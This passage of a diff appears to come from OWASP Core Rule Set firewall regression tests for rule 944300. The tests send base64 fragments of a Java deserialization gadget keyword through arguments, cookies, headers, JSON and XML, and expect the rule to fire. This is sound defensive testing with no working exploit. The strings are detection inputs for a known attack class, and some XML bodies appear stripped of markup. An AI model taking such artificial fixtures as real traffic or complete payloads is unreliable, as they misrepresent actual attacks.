data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 105 desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 106 desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 107 desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 108 desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 109 desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 110 desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS 
test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 111 desc: "Argument test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 112 desc: "Argument name includes keyword GZvcmNsb3N1cmU" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_id: 113 desc: "Cookie test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" 
+ uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 114 desc: "Cookie name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GZvcmNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 115 desc: "Request header test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 116 desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-117 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 117 desc: "XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-118 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 118 desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-119 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 119 desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - 
test_title: 944300-120 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 120 desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GZvcmNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_id: 121 desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" 
- method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GZvcmNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 122 desc: "Argument test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 123 desc: "Argument name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_id: 124 desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 125 desc: "Cookie name 
includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bmb3JjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 126 desc: "Request header test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 127 desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 128 desc: "XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 129 desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 130 desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 131 desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 